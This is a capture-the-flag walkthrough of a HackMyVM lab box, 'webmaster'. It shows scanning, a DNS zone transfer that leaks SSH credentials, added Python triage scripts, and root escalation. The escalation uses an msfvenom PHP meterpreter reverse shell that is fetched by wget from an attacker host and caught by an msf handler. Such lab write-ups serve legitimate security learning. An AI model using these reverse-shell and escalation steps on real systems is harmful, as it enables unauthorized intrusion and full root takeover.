Hackmyvm target series (1) -webmaster
2022-07-06 14:03:00 【The moon should know my meaning】
1. Information gathering
First, sweep the network segment with nmap to find live hosts. There are many hosts on the campus network, so instead of inspecting them one by one, grep the output for the VirtualBox MAC vendor string and pick out the target directly (-sP is the legacy name for -sn, a ping sweep without a port scan):
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then port scan the target host to see which services it exposes:
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8
The scan finds three services: ssh, dns and http.
Visiting the web site shows a single picture. It roughly asks: where do you keep your password? Bitwarden and KeePass are password managers. Note the "TXT" below the picture; it turns out to be an important hint.
Scan for directories and files with dirsearch:
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30
However, no useful information was found .
The picture hints at "txt", so try brute-forcing .txt file names with wfuzz:
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt
As with dirsearch, nothing useful turns up.
Then check the page source and find webmaster.hmv, which looks like a domain name. Add it to the hosts file, but that changes nothing on the web side.
2. Exploitation
Recall that nmap found a DNS service. Try a zone transfer (AXFR) for the domain with dig:
dig axfr @192.168.200.8 webmaster.hmv
# @IP specifies the DNS server to query
The transfer is allowed, and one record stands out (the TXT hint from the picture): it looks like a username and password:
john:Myhiddenpazzword
Try logging in over ssh with these credentials; the login succeeds.
This gives the first flag.
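The zone transfer step above can be automated. The following script is an added example, not code from the original walkthrough: it parses dig's AXFR listing, checks whether the transfer was actually permitted, lists every hostname the zone leaks (worth feeding back into the port scan) and flags TXT records that look like user:password pairs. The sample zone embedded in it is constructed; only the credential TXT record mirrors what the page found, the SOA, NS and A lines are assumptions.

```python
import re
import sys

# Constructed sample of `dig axfr @192.168.200.8 webmaster.hmv` output (not the
# box's real zone): only the TXT record matches the walkthrough's finding.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1 <<>> axfr @192.168.200.8 webmaster.hmv
;; global options: +cmd
webmaster.hmv.\t\t604800\tIN\tSOA\tns1.webmaster.hmv. admin.webmaster.hmv. 1 604800 86400 2419200 604800
webmaster.hmv.\t\t604800\tIN\tNS\tns1.webmaster.hmv.
webmaster.hmv.\t\t604800\tIN\tTXT\t"john:Myhiddenpazzword"
ns1.webmaster.hmv.\t604800\tIN\tA\t192.168.200.8
webmaster.hmv.\t\t604800\tIN\tSOA\tns1.webmaster.hmv. admin.webmaster.hmv. 1 604800 86400 2419200 604800
;; Query time: 1 msec
;; SERVER: 192.168.200.8#53(192.168.200.8) (TCP)
;; XFR size: 5 records (messages 1, bytes 210)
"""

QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')          # one <character-string> of a TXT rdata
CRED = re.compile(r"^([A-Za-z0-9._-]+):(\S+)$")       # user:password, no whitespace


def parse_axfr(dig_output):
    """Parse dig's AXFR listing into (owner, ttl, type, rdata) tuples, skipping comments."""
    records = []
    for line in dig_output.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split(None, 4)
        if len(fields) < 5 or fields[2] != "IN":
            continue
        owner, ttl, _cls, rtype, rdata = fields
        records.append((owner.rstrip(".").lower(), int(ttl), rtype, rdata))
    return records


def transfer_allowed(dig_output):
    """False when the server refused the AXFR (dig prints '; Transfer failed.') or sent no records."""
    return "Transfer failed" not in dig_output and bool(parse_axfr(dig_output))


def txt_strings(rdata):
    """Join the quoted character-strings of a TXT rdata into one plain string."""
    parts = QUOTED.findall(rdata)
    return "".join(parts) if parts else rdata


def find_credentials(records):
    """(owner, user, password) for every TXT record whose content looks like user:password."""
    creds = []
    for owner, _ttl, rtype, rdata in records:
        if rtype != "TXT":
            continue
        m = CRED.match(txt_strings(rdata))
        if m:
            creds.append((owner, m.group(1), m.group(2)))
    return creds


def hostnames(records):
    """Every name the zone reveals: record owners plus NS/CNAME/MX targets."""
    names = set()
    for owner, _ttl, rtype, rdata in records:
        names.add(owner)
        if rtype in ("NS", "CNAME"):
            names.add(rdata.rstrip(".").lower())
        elif rtype == "MX":
            names.add(rdata.split()[-1].rstrip(".").lower())
    return names


if __name__ == "__main__":
    # Usage: dig axfr @192.168.200.8 webmaster.hmv | python3 axfr_triage.py
    # With no piped input the constructed sample is used.
    text = SAMPLE_AXFR if sys.stdin.isatty() else sys.stdin.read()
    if not transfer_allowed(text):
        sys.exit("zone transfer refused or empty")
    recs = parse_axfr(text)
    for name in sorted(hostnames(recs)):
        print("host:", name)
    for owner, user, pw in find_credentials(recs):
        print(f"credential in TXT of {owner}: {user} / {pw}")
```

The credential pattern is deliberately anchored and forbids whitespace, so common TXT payloads such as SPF or domain-verification strings are not reported; a record the heuristic misses is still printed among the hostnames, so the full listing remains worth reading by hand.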
3. Privilege escalation
Next comes privilege escalation. Start by listing what sudo allows:
sudo -l
This shows that nginx can be started through sudo without entering a password.
Looking at the process list, nginx is running as root.
Then check the web root directory: any user can create, write and delete files there. Combined with nginx running as root, we can drop a web shell into the web root and request it over HTTP; the shell then runs with root privileges.
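The three conditions just described (nginx runnable via sudo without a password, nginx processes owned by root, a writable web root) can be checked together. The script below is an added example, not part of the original walkthrough: its parsers take the text of `sudo -l` and `ps aux`, and the writability check uses the real filesystem. The embedded `sudo -l` and `ps aux` samples are constructed to match the page's description; the exact sudo rule `(ALL) NOPASSWD: /usr/sbin/nginx` and the PIDs are assumptions.

```python
import os
import re
import subprocess
import sys

# Constructed `sudo -l` output for john; the rule line is an assumption that
# matches the page's finding (nginx without a password).
SAMPLE_SUDO_L = """\
Matching Defaults entries for john on webmaster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User john may run the following commands on webmaster:
    (ALL) NOPASSWD: /usr/sbin/nginx
"""

# Constructed `ps aux` excerpt: nginx master and worker both owned by root.
SAMPLE_PS = """\
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         512  0.0  0.2  32540  3300 ?        Ss   14:00   0:00 nginx: master process /usr/sbin/nginx
root         513  0.0  0.3  33040  4100 ?        S    14:00   0:00 nginx: worker process
john        1024  0.0  0.1   7420  1900 pts/0    R+   14:05   0:00 ps aux
"""

# "(runas) TAG: TAG: cmd1, cmd2" as printed by sudo -l
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def sudo_nopasswd_commands(sudo_l_output):
    """(run_as, command) pairs that sudo -l lists with the NOPASSWD tag."""
    found = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m or "NOPASSWD:" not in m.group("tags"):
            continue
        for cmd in m.group("cmds").split(", "):
            found.append((m.group("runas"), cmd.strip()))
    return found


def processes_as_root(ps_output, name):
    """PIDs of processes owned by root whose command line contains `name`."""
    pids = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 10)                # COMMAND is the 11th column and may contain spaces
        if len(fields) < 11:
            continue
        user, pid, command = fields[0], fields[1], fields[10]
        if user == "root" and name in command:
            pids.append(int(pid))
    return pids


def writable_dirs(paths):
    """Subset of `paths` that exist as directories and are writable by the current user."""
    return [p for p in paths if os.path.isdir(p) and os.access(p, os.W_OK)]


def assess(sudo_l_output, ps_output, webroot):
    """Combine the three checks into one verdict on the root web-shell route."""
    sudo_hits = [c for c in sudo_nopasswd_commands(sudo_l_output) if "nginx" in c[1]]
    root_pids = processes_as_root(ps_output, "nginx")
    writable = bool(writable_dirs([webroot]))
    return {
        "sudo_nginx_nopasswd": sudo_hits,
        "nginx_root_pids": root_pids,
        "webroot_writable": writable,
        # a dropped PHP file runs with the web server's privileges only if the
        # server is root AND we can place the file where it will be served
        "root_webshell_feasible": bool(root_pids) and writable,
    }


if __name__ == "__main__":
    # Usage on the target: python3 privesc_check.py /path/to/webroot
    webroot = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"
    try:
        sudo_l = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
        ps = subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout
    except OSError:                                  # sudo/ps missing: fall back to the constructed samples
        sudo_l, ps = SAMPLE_SUDO_L, SAMPLE_PS
    print(assess(sudo_l, ps, webroot))
```

One caveat the check does not cover: on many setups PHP is executed by a separate php-fpm pool rather than by the nginx worker, and the web shell then runs as that pool's user, so run `processes_as_root(ps, "php")` as well before relying on the nginx result. `sudo -n` is used so the script never blocks on a password prompt; if the rule is absent the output is simply empty.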
First check the host information; it is an x86 machine. (For a PHP payload the architecture does not matter, since the target's PHP interpreter executes it, but it is worth knowing before choosing a native payload.)
Use msfvenom to create the PHP meterpreter payload:
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
Then, on the target, download the payload into the web root with wget (the attacker machine serves it over HTTP on port 7890):
wget http://192.168.200.130:7890/shell.php
Grant execute permission (strictly unnecessary for a PHP file executed by the web server, which only needs to read it, but harmless):
chmod +x shell.php
Start the handler in msf:
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555
From Kali, request shell.php under the web root in the browser. Because the web server process runs as root, the PHP payload executes with root privileges.
msf receives the session; the user is root.
This gives the last flag.